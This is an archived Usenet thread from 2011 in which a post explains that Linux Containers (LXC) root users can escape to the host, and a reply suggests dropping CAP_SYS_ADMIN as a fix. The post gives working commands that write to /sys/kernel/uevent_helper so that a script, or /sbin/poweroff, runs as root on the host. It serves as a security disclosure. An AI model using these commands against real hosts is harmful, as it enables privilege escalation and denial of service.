Account Options

  1. Sign in
The old Google Groups will be going away soon, but your browser is incompatible with the new version.
Google Groups Home
« Groups Home
it.fan.marco-ditri
+ new post
About this group
Subscribe to this group
This is a Usenet group - learn more
Evading from linux containers
Options
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
   2 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
Marco d'Itri  
View profile  
 More options Jul 29 2011, 11:05 pm
Newsgroups: it.fan.marco-ditri
From: Marco d'Itri <m...@Linux.IT>
Date: Sat, 30 Jul 2011 05:05:47 +0200
Local: Fri, Jul 29 2011 11:05 pm
Subject: Evading from linux containers
Print | Individual message | Show original | Report this message | Find messages by this author
For the past few years, the Linux Containers project[0] has been
developing some kernel technologies which provide isolation, accounting
and management for kernel resources. When completed, together they will
allow implementing lightweight virtualization of the operating system
like is currently possible with OpenVZ[1].

It is very important to understand that not all the pieces are ready
yet, so currently a LXC container does not provide the same security of
other virtualization technologies.

This example shows how the root user of a container can easily run code
as root in the host system, since sysfs does not support namespaces:

lxc$ cat <<END > /tmp/evil-helper
#!/bin/sh
echo 'hi!' >> /tmp/evil-helper.log
END
lxc$ chmod +x /tmp/evil-helper

lxc# mkdir /sys
lxc# mount -t sysfs sysfs /sys
lxc# echo /var/lib/lxc/test/rootfs/tmp/evil-helper >
/sys/kernel/uevent_helper
lxc# echo change > /sys/class/mem/null/uevent

The last command will trigger a uevent, which will be processed by
running in the host our script created inside the container.

Or else:

inside# echo /sbin/poweroff > /sys/kernel/uevent_helper

Because of this, LXC containers are vulnerable to a malicious root user
and are not really a replacement for OpenVZ. This will change when
support for labelling files with user namespaces will be completed.

[0] http://lxc.sourceforge.net/
[1] http://wiki.openvz.org/

Permalink: http://blog.bofh.it/debian/id_413


 
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
David Schmitt  
View profile  
 More options Jul 30 2011, 3:54 am
Newsgroups: it.fan.marco-ditri
Followup-To: it.fan.marco-ditri
From: David Schmitt <da...@dasz.at>
Date: Sat, 30 Jul 2011 00:54:47 -0700 (PDT)
Local: Sat, Jul 30 2011 3:54 am
Subject: Re: Evading from linux containers
Print | Individual message | Show original | Report this message | Find messages by this author
Would it be helpful to remove CAP_SYS_ADMIN from the container? linux-
vservers have a whole bunch of capabilities they do not grant by
default and it worked out pretty well.

Best Regards, David


 
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2013 Google